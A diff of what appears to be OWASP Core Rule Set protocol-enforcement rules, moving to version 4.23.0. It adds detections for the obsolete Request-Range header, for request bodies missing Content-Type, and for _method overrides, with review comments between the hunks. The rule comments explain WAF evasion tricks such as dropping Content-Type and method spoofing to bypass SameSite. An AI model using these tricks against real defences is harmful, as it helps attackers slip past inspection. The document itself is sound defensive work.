@@ -284,7 +284,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \ @@ -307,7 +307,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ # https://datatracker.ietf.org/doc/html/rfc7233 # https://seclists.org/fulldisclosure/2011/Aug/175 # -SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ +SecRule REQUEST_HEADERS:Range "@rx (\d+)-(\d+)" \ "id:920190,\ phase:1,\ block,\ 
@@ -323,12 +323,54 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule TX:2 "@lt %{tx.1}" \ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" +# The `Request-Range` header is a legacy/non-standard HTTP header that dates back to Netscape +# Navigator 2-3 and MSIE 3 (~1996-1997). It was never part of any HTTP RFC and has no legitimate +# use in modern web traffic. +# +## Background +# +### Origin of `Request-Range` +# +# The header originated from an early draft of HTTP byte-range requests before standardization: +# +# - **Draft standard**: Defined `Request-Range` header with `multipart/x-byteranges` response type +# - **HTTP/1.1 (RFC 2068/7233/9110)**: Standardized as `Range` header with `multipart/byteranges` response type +# - **Netscape Navigator 2-3**: Sent **both** `Range` and `Request-Range` headers (with the same value) +# - **Netscape Communicator 4+**: Dropped the non-standard `Request-Range` header +# +# Rationale for Blocking +# +# | Factor | Assessment | +# |---------------------------|---------------------------------------------------------------| +# | **Legitimate modern use** | None - header is ~25 years obsolete | +# | **Last known clients** | Netscape Navigator 2-3, MSIE 3 (1996-1997) | +# | **False positive risk** | Essentially zero | +# | **Attack surface** | Servers may still process it; could bypass `Range`-only rules | +# | **RFC status** | Never standardized; not in RFC 9110 | +SecRule &REQUEST_HEADERS:Request-Range "@gt 0" \ + "id:920660,\ + phase:1,\ + block,\ + t:none,\ + msg:'Obsolete Request-Range header detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + 
tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # # Broken/Malicious clients often have duplicate or conflicting headers @@ -356,7 +398,7 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive| tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -385,7 +427,7 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \ @@ -430,7 +472,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -487,7 +529,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-25 tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -519,7 +561,7 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ skipAfter:END-HOST-CHECK" 
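Review bot: `logdata:'%{MATCHED_VAR}'` on the new 920660 records the header count rather than the header: the operand is `&REQUEST_HEADERS:Request-Range`, so the matched value is the number produced by the `&` counting operator (normally `1`), which tells an analyst nothing about what the client actually sent. Use `logdata:'%{REQUEST_HEADERS.Request-Range}'` so the offending value reaches the audit log. The comment block above the rule is written as Markdown (`## Background`, `### Origin of ...`, a pipe table) inside `.conf` comments, which departs from the `# -=[ Rule Logic ]=-` / `# -=[ References ]=-` layout the rest of this file uses, and the `# Rationale for Blocking` line lacks the `##` its sibling headings carry, so it is inconsistent even on its own terms. Since the table itself rates legitimate use as none and false-positive risk as essentially zero, the choice of `severity:'WARNING'` rather than the `CRITICAL` given to the other protocol rules this commit adds deserves one explanatory sentence in that comment.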
@@ -539,7 +581,7 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -580,7 +622,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -606,7 +648,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ 
@@ -640,37 +682,40 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" # -# Missing Content-Type Header with Request Body +# Missing Content-Type Header with Request Body (Phase 1) # # -=[ Rule Logic ]=- -# This rule will first check to see if the value of the Content-Length header is -# non-equal to 0. The chained rule is then checking the existence of the -# Content-Type header. The RFCs do not state there must be a -# Content-Type header. However, a request missing a Content-Header is a -# strong indication of a non-compliant browser or an evasion attempt. -# -# Also, omitting the CT header allows to bypass the Request Body Processor -# unless you set the optional tx.enforce_bodyproc_urlencoded variable. -# -# Enabling this rule is important as it maximizes -# the detection of risky practices that attempt to disable -# body processors (such as XML, JSON, etc.) in order to hide -# malicious payloads. +# This rule checks if the Content-Length header value is non-zero (indicating +# the client declares a body is present), then verifies the existence of the +# Content-Type header. While RFCs do not mandate a Content-Type header for all +# requests, its absence in requests with a body is a strong indication of a +# non-compliant browser or an evasion attempt. +# +# Omitting the Content-Type header allows bypassing the Request Body Processor +# unless you set the optional tx.enforce_bodyproc_urlencoded variable. This can +# be used to evade detection by preventing proper parsing of XML, JSON, or other +# body formats. +# +# This rule operates in phase:1 (request headers) based on the Content-Length +# header declaration. 
A complementary rule (920640) operates in phase:2 based +# on the actual REQUEST_BODY_LENGTH to catch cases where the body is present +# but Content-Length was omitted or set to zero. # # -=[ References ]=- -# http://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7230.html#header.content-length SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ "id:920340,\ phase:1,\ block,\ t:none,\ - msg:'Request Containing Content, but Missing Content-Type header',\ + msg:'Content-Type header missing from request with non-zero Content-Length',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -679,7 +724,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -724,7 +769,7 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -757,7 +802,7 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &ARGS "@gt %{tx.max_num_args}" \ @@ -783,7 +828,7 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \ 
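Review bot: Changing `msg:` on an existing rule id (from `'Request Containing Content, but Missing Content-Type header'` to `'Content-Type header missing from request with non-zero Content-Length'`) alters a string that log pipelines, SIEM correlation rules and dashboards commonly key on, so it is a breaking change for alert consumers even though the id and score are unchanged. If the new wording is kept it should be called out in the changelog and, ideally, in the rule's comment, e.g. `# NOTE: msg text changed in 4.23.0; alerting keyed on the old string must be updated.` The rewritten Rule Logic text says the rule fires when Content-Length is non-zero, but `!@rx ^0$` is only evaluated when the header is present; stating explicitly that an absent Content-Length is left to 920640 would remove the ambiguity for anyone tuning the pair. 920340's action list continues past the end of this hunk.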
@@ -811,7 +856,7 @@ SecRule &TX:ARG_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS "@gt %{tx.arg_length}" \ @@ -836,7 +881,7 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \ @@ -862,7 +907,7 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ @@ -889,7 +934,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \ @@ -929,7 +974,7 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s*(?:action|bounda tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -952,7 +997,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" 
@@ -980,7 +1025,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" 
@@ -1007,10 +1052,54 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# +# Missing Content-Type Header with Request Body (Phase 2) +# +# -=[ Rule Logic ]=- +# This rule checks if the actual REQUEST_BODY_LENGTH is greater than zero +# (indicating a body was received), then verifies the existence of the +# Content-Type header. This operates in phase:2 (request body) and complements +# rule 920340 which checks in phase:1 based on the Content-Length header. +# +# This rule catches evasion attempts where: +# - The Content-Length header was omitted entirely +# - The Content-Length header was set to zero but a body was sent anyway +# - The request bypassed phase:1 checks but still contains a body +# +# Without a Content-Type header, the Request Body Processor cannot properly +# parse the body content (XML, JSON, multipart, etc.), allowing attackers to +# hide malicious payloads from inspection unless tx.enforce_bodyproc_urlencoded +# is configured. +# +# -=[ References ]=- +# https://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7230.html#message.body +# +SecRule REQUEST_BODY_LENGTH "@gt 0" \ + "id:920640,\ + phase:2,\ + block,\ + t:none,\ + msg:'Content-Type header missing from request with body',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + # # Restrict protocol versions. # 
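Review bot: 920640 scores the same condition as 920340 a second time: a request that declares a non-zero Content-Length, carries a body and omits Content-Type matches 920340 in phase 1 and then this chain in phase 2, each adding `tx.critical_anomaly_score` to `tx.inbound_anomaly_score_pl1`, so one defect is counted twice. The comment presents 920640 as covering the cases 920340 misses (Content-Length omitted or zero), but `REQUEST_BODY_LENGTH "@gt 0"` does not restrict it to those cases. A cheap guard that keeps the stated intent is to record the phase-1 match in 920340's final chain link (constructed name, e.g. `setvar:'tx.920340_matched=1'`) and add `SecRule &TX:920340_matched "@eq 0" "t:none,chain"` as a link before the Content-Type check here; the `&TX:… "@eq …"` count idiom is the one this file already uses for optional variables. Without such a guard, operators who excluded 920340 for a legitimate client with `SecRuleRemoveById` will start blocking that client in phase 2, so at minimum the overlap should be stated in the comment and the changelog.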
@@ -1029,7 +1118,7 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1052,7 +1141,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" @@ -1080,7 +1169,7 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1134,7 +1223,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" @@ -1168,7 +1257,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 100" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1201,7 +1290,7 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\* tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -1225,7 +1314,7 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ @@ -1250,7 +1339,7 @@ SecRule REQUEST_URI_RAW "@contains #" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1283,13 +1372,13 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -1314,7 +1403,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'O # https://httpd.apache.org/security/CVE-2011-3192.txt -SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ +SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:1,\ block,\ @@ -1329,7 +1418,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ @@ -1354,10 +1443,10 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" - SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -1376,7 +1465,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/120',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -1399,7 +1488,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10 tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1426,7 +1515,7 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" @@ -1449,7 +1538,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=\x5c]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1472,7 +1561,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ chain" @@ -1501,7 +1590,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BODY "@rx \x25" \ 
@@ -1509,8 +1598,56 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded SecRule REQUEST_BODY "@validateUrlEncoding" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -=[ Rule 920650: HTTP Method Override via _method Parameter ]=- +# +# The _method parameter is used by several web frameworks (Laravel, Rails, +# Symfony, CakePHP, Express.js, Phoenix, etc.) to override the HTTP method. +# This allows HTML forms to simulate PUT, PATCH, DELETE requests which are +# not natively supported by browsers. +# +# While this is legitimate framework behavior, it can be abused to: +# - Bypass WAF rules that inspect based on HTTP method +# - Bypass SameSite=Lax cookie restrictions for CSRF attacks +# - Circumvent method-based access control lists +# +# This rule detects _method parameter in both query string and request body +# when it specifies a potentially dangerous method (DELETE, PUT, PATCH, etc.). +# +# To allow _method parameter for applications that legitimately use it, +# set tx.allow_method_override_parameter=1 in crs-setup.conf (see rule 900210). 
+# +# References: +# - https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions +# - https://blog.mindedsecurity.com/2016/01/request-parameter-method-may-lead-to.html +# - https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# - https://laravel.com/docs/routing#form-method-spoofing +# - https://guides.rubyonrails.org/form_helpers.html#how-do-forms-with-patch-put-or-delete-methods-work +# +SecRule TX:allow_method_override_parameter "@eq 0" \ + "id:920650,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP method override attempt via _method parameter',\ + logdata:'Requested method override: %{ARGS._method}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS:_method "@rx ^[a-z]{3,10}$" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1536,7 +1673,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateB tag:'OWASP_CRS',\ 